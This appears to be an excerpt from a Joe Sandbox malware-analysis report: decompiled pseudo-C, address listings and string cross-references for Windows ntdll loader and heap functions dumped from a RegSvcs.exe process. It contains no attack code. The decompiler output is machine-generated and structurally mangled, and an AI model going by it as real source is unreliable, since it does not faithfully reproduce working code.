				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00FC934A() != 0) {
								_t159 = E0103A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x10a5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01035510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x10a5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00FC849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00FC8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00FC8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x10a5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x10a5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00FD2280(_t92, 0x10a86cc);
															_t94 = E01089DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00FE61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x10a5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00FC8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x10a5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x10a5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00FFF380(_t136, 0xf91184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00FD2280(_t108, 0x10a86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00FE61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01089D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00FCFFB0(_t118, _t156, 0x10a86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00FF9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x00fc8799
0x00fc879d
0x00fc87a1
0x00fc87a3
0x00fc87a8
0x00fc87c3
0x00fc87c3
0x00fc87c8
0x00fc87d1
0x00fc87d4
0x00fc87d8
0x00fc87e5
0x00fc87ec
0x01019bfe
0x01019c00
0x01019c02
0x01019c08
0x01019c0d
0x01019c0f
0x01019c14
0x01019c2d
0x01019c32
0x01019c37
0x01019c3a
0x01019c3c
0x01019c42
0x01019c42
0x01019c3c
0x01019c02
0x00fc87da
0x00fc87df
0x00fc87e3
0x00000000
0x00000000
0x00fc87e3
0x00fc87f2
0x00000000
0x00fc87fb
0x00fc87fd
0x00fc87fe
0x00fc880e
0x00fc880f
0x00fc8810
0x00fc8814
0x00fc881a
0x00fc881c
0x00fc881f
0x00fc8821
0x00fc8822
0x00fc8824
0x00fc8826
0x00fc882c
0x00fc882e
0x01019c48
0x01019c48
0x00fc8834
0x00fc8834
0x00fc8837
0x00000000
0x00000000
0x00fc8837
0x00fc882e
0x00fc883d
0x00fc8840
0x00fc8843
0x00fc8846
0x00fc8849
0x00fc884c
0x00fc884e
0x00fc8850
0x00fc8852
0x00fc8854
0x00fc8857
0x00fc88b4
0x00fc88b6
0x00fc88b6
0x00fc8859
0x00fc8859
0x00fc8859
0x00fc8861
0x00fc8866
0x00fc886a
0x00fc893d
0x00fc8941
0x00000000
0x00fc8947
0x00fc8947
0x00fc894a
0x00fc894c
0x00000000
0x00fc8952
0x00fc8955
0x00fc895a
0x00fc895d
0x00fc895d
0x00fc895f
0x00fc8961
0x00fc8961
0x00fc8968
0x00000000
0x00000000
0x00fc896a
0x00fc896b
0x00fc896e
0x00000000
0x00fc8970
0x00fc8970
0x00fc8970
0x00fc8970
0x00fc8972
0x00fc8972
0x00fc8974
0x00000000
0x00fc897a
0x00fc897a
0x00fc897d
0x00000000
0x00fc8983
0x01019c65
0x01019c6d
0x01019c72
0x01019c75
0x01019c75
0x01019c82
0x01019c86
0x01019c87
0x01019c88
0x01019c89
0x01019c8c
0x01019c90
0x01019c95
0x01019c97
0x01019ca0
0x01019ca3
0x01019ca9
0x01019ca9
0x00000000
0x01019ca9
0x01019ca3
0x00000000
0x01019c97
0x00fc897d
0x00000000
0x00fc8974
0x00fc8988
0x00fc8992
0x00fc8996
0x00000000
0x00fc8996
0x00fc894c
0x00000000
0x00fc8870
0x00fc887b
0x00fc887d
0x00fc887f
0x00fc8881
0x00fc8884
0x00fc8884
0x00fc8886
0x00fc8889
0x00fc888c
0x00fc888e
0x00fc8891
0x00fc8891
0x00fc8898
0x00000000
0x00000000
0x00fc889a
0x00fc889b
0x00fc889e
0x00000000
0x00000000
0x00fc88a0
0x00fc88a8
0x00fc88b0
0x00fc88b2
0x00fc88d3
0x00fc88d5
0x00000000
0x00fc88d7
0x00fc88db
0x00fc88dc
0x00fc88e0
0x00fc88e8
0x00fc88ee
0x00fc88f0
0x00fc88f3
0x00fc88fc
0x00fc8901
0x00fc8906
0x00fc890c
0x00fc890c
0x00fc890f
0x00fc8916
0x00fc8917
0x00fc8918
0x00fc8919
0x00fc891a
0x00fc891f
0x00fc8921
0x01019c52
0x01019c55
0x01019c5b
0x01019cac
0x01019cc0
0x01019cc0
0x01019c55
0x00fc8927
0x00fc8927
0x00fc892f
0x00fc8933
0x00000000
0x00fc88f5
0x00fc88f5
0x00000000
0x00fc88f7
0x00fc88f7
0x00fc88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc88fa
0x00fc88f5
0x00fc88f3
0x00000000
0x00fc88d5
0x00000000
0x00fc88b2
0x00fc88c9
0x00000000
0x00fc88c9
0x00fc887f
0x00fc886a
0x00fc8857
0x00fc8852
0x00fc88bf
0x00fc88bf
0x00fc87aa
0x00fc87ad
0x00fc87ae
0x00fc87b4
0x00fc87b5
0x00fc87b6
0x00fc87b8
0x00fc87bd
0x00fc87c1
0x00fc87f4
0x00fc87fa
0x00000000
0x00000000
0x00000000
0x00fc87c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01019C18
minkernel\ntdll\ldrsnap.c, xrefs: 01019C28
LdrpDoPostSnapWork, xrefs: 01019C1E

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 567fa36ea4d3191b35a565486f0f0515a689daa279784d5812a157452d12fc80
Instruction ID: b98ed9fe1f2a7f2b3a5d2760e251b635b087cd7ddeb209e0dd0ac6900f278dcf
Opcode Fuzzy Hash: 567fa36ea4d3191b35a565486f0f0515a689daa279784d5812a157452d12fc80
Instruction Fuzzy Hash: DA91F331A0021B9BDF18DF59C982FBA73B5FF44394B54416DE845AB681EB30ED02EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FEAC7B Relevance: 4.0, Strings: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00FEAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0100D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x10a8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E00FF96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01063C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E00FF96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E00FBB150();
							} else {
								E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E00FBB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E010714FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E00FD7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E01071411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E00FD7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E01071411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}

0x00feac85
0x00feac88
0x00feac8a
0x00feac8d
0x00feac91
0x00feac99
0x00feac9c
0x01029f57
0x01029f5b
0x01029f60
0x01029f60
0x00feaca8
0x00feacae
0x00feacda
0x00feacde
0x00feace8
0x00feaceb
0x00feacee
0x00000000
0x00feacee
0x00feacf6
0x00feacb0
0x00feacb0
0x00feacbb
0x00feacbd
0x00feacc0
0x00feacc5
0x00feadae
0x00feadb4
0x00feadb4
0x00feacd4
0x00feacd8
0x00feacf9
0x00feacff
0x00fead04
0x00fead08
0x00fead09
0x00fead10
0x00fead12
0x00fead18
0x01029f6f
0x01029f74
0x01029f76
0x01029f7c
0x01029f84
0x01029f88
0x01029f89
0x01029f90
0x01029f90
0x01029f76
0x00fead1e
0x00fead24
0x00fead26
0x0102a097
0x0102a09b
0x0102a0ba
0x0102a0bf
0x0102a09d
0x0102a0b2
0x0102a0b7
0x0102a0c5
0x0102a0c8
0x0102a0cb
0x0102a0d2
0x00000000
0x00fead2c
0x00fead2c
0x00fead2f
0x00fead34
0x00fead36
0x01029f97
0x01029f9a
0x00000000
0x00000000
0x01029fa9
0x00fead3e
0x00fead3e
0x00fead41
0x01029fb3
0x01029fb9
0x01029fc0
0x01029fd0
0x01029fd0
0x01029fc0
0x00fead4a
0x00fead50
0x00fead5c
0x00fead62
0x00fead68
0x00fead6b
0x00fead6d
0x01029fda
0x01029fdd
0x00000000
0x00000000
0x01029fec
0x00000000
0x00fead73
0x00fead73
0x00fead73
0x00fead75
0x00fead75
0x00fead78
0x01029ff6
0x01029ffc
0x0102a003
0x0102a00e
0x0102a010
0x0102a01b
0x0102a01b
0x0102a01b
0x0102a038
0x0102a038
0x0102a003
0x00fead84
0x00fead89
0x00fead8c
0x00fead8e
0x0102a042
0x0102a045
0x00000000
0x00000000
0x0102a054
0x00000000
0x00fead94
0x00fead94
0x00fead94
0x00fead96
0x00fead96
0x00fead99
0x0102a063
0x0102a065
0x0102a070
0x0102a070
0x0102a070
0x0102a08d
0x0102a08d
0x00feada4
0x00feada6
0x00000000
0x00feada6
0x00fead8e
0x00fead6d
0x00fead3c
0x00fead3c
0x00000000
0x00fead3c
0x00000000
0x00000000
0x00000000
0x00feacd8

Strings

RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0102A0CD
HEAP: , xrefs: 0102A0BA
HEAP[%wZ]: , xrefs: 0102A0AD

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: ad6a09997e98ed561d3ab9840f3c249ff5ae3803a82814bd70ab24c187558ae3
Instruction ID: 95bff11f35f768bcf1e3510f6c832dcd263e007cb61ef87d360a8fee97a09f87
Opcode Fuzzy Hash: ad6a09997e98ed561d3ab9840f3c249ff5ae3803a82814bd70ab24c187558ae3
Instruction Fuzzy Hash: 94811631604684EFD726CB69CC94FA9BBF8FF04314F1441A5F5918B692D778E940EB11

Uniqueness

Uniqueness Score: -1.00%

Function 00FDB73D Relevance: 3.9, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00FDB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0107A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x10a8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E00FBB150();
					} else {
						E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E00FBB150();
					__eflags =  *0x10a7bc8;
					if(__eflags == 0) {
						E01072073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0107A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x10a8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x10a8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E00FDB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0107A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E00FDE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}

0x00fdb746
0x00fdb74b
0x00fdb74d
0x00fdb750
0x00fdb755
0x00fdb758
0x00fdb758
0x00fdb75e
0x00fdb763
0x00fdb764
0x00fdb76a
0x00fdb76d
0x00fdb771
0x00fdb776
0x00fdb85c
0x00fdb85d
0x00fdb860
0x00fdb865
0x01022ba1
0x01022ba2
0x01022ba9
0x01022bae
0x01022bae
0x00fdb77c
0x00fdb77c
0x00fdb77c
0x00fdb785
0x00fdb788
0x01022bb6
0x01022bb9
0x00000000
0x00000000
0x01022bbf
0x01022bc5
0x01022bc9
0x01022be8
0x01022bed
0x01022bcb
0x01022be0
0x01022be5
0x01022bf3
0x01022bf8
0x01022bfd
0x01022c05
0x01022c0e
0x01022c0e
0x00000000
0x00fdb78e
0x00fdb78e
0x00fdb78e
0x00fdb791
0x00fdb791
0x00fdb797
0x00fdb797
0x00fdb79f
0x00fdb7a9
0x00fdb7af
0x00fdb7af
0x00fdb7b1
0x00fdb7b6
0x00fdb7e2
0x00fdb7e2
0x00fdb7e7
0x00fdb880
0x00fdb7ed
0x00fdb7ed
0x00fdb7ed
0x00fdb7ef
0x00fdb7f2
0x00fdb7f2
0x00fdb7f5
0x00fdb7fa
0x01022c2d
0x01022c2e
0x01022c39
0x00fdb800
0x00fdb800
0x00fdb802
0x00fdb805
0x00fdb808
0x00fdb808
0x00fdb80a
0x00fdb80d
0x00fdb816
0x00fdb81c
0x00fdb822
0x00fdb82f
0x00fdb88b
0x00fdb892
0x00fdb897
0x00fdb899
0x00fdb89b
0x00fdb89e
0x00fdb8a5
0x00fdb8a8
0x00fdb8aa
0x00fdb8ac
0x00fdb8ac
0x00fdb8aa
0x00fdb892
0x00fdb831
0x00fdb839
0x00fdb83b
0x00fdb83b
0x00fdb844
0x00fdb84b
0x00fdb852
0x00fdb7b8
0x00fdb7ba
0x00fdb7bf
0x00fdb7c4
0x01022c18
0x01022c19
0x01022c23
0x00fdb7ca
0x00fdb7ca
0x00fdb7cc
0x00fdb7cf
0x00fdb7d1
0x00fdb7d1
0x00fdb7d4
0x00fdb7dc
0x00fdb8bb
0x00fdb8bb
0x00fdb8be
0x00fdb8be
0x00fdb8c1
0x00000000
0x00000000
0x00fdb8c3
0x00fdb8c5
0x00fdb8c7
0x00fdb8e0
0x00000000
0x00fdb8e0
0x00fdb8cc
0x00fdb8cc
0x00000000
0x00fdb8cc
0x00fdb8d6
0x00fdb8d6
0x00000000
0x00fdb7dc
0x00fdb7b6

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 01022BF3
HEAP: , xrefs: 01022BE8
HEAP[%wZ]: , xrefs: 01022BDB

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
